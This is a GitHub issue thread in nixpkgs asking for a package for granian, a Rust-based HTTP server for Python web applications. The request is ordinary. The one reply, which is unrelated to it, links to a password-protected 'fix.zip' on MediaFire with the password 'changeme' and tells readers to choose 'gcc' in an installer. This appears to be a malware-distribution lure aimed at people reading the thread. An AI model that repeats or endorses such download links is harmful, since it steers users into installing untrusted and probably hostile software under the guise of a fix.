### ISSUE TITLE
Package request: granian

### ISSUE THREAD

**Issue by vifino** [NixOS/nixpkgs#337480]
**Project description**

Granian is a Rust HTTP server for Python ASGI/WSGI/RSGI applications.
It fulfills a similar purpose as daphne, gunicorn, uvicorn or uwsgi, but [seems to perform better](https://github.com/emmett-framework/granian/blob/master/benchmarks/vs.md).

**Metadata**

* homepage URL: https://github.com/emmett-framework/granian
* source URL: https://github.com/emmett-framework/granian
* license: bsd3
* platforms: unix

---

Add a :+1: [reaction] to [issues you find important].

[reaction]: https://github.blog/2016-03-10-add-reactions-to-pull-requests-issues-and-comments/
[issues you find important]: https://github.com/NixOS/nixpkgs/issues?q=is%3Aissue+is%3Aopen+sort%3Areactions-%2B1-desc

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
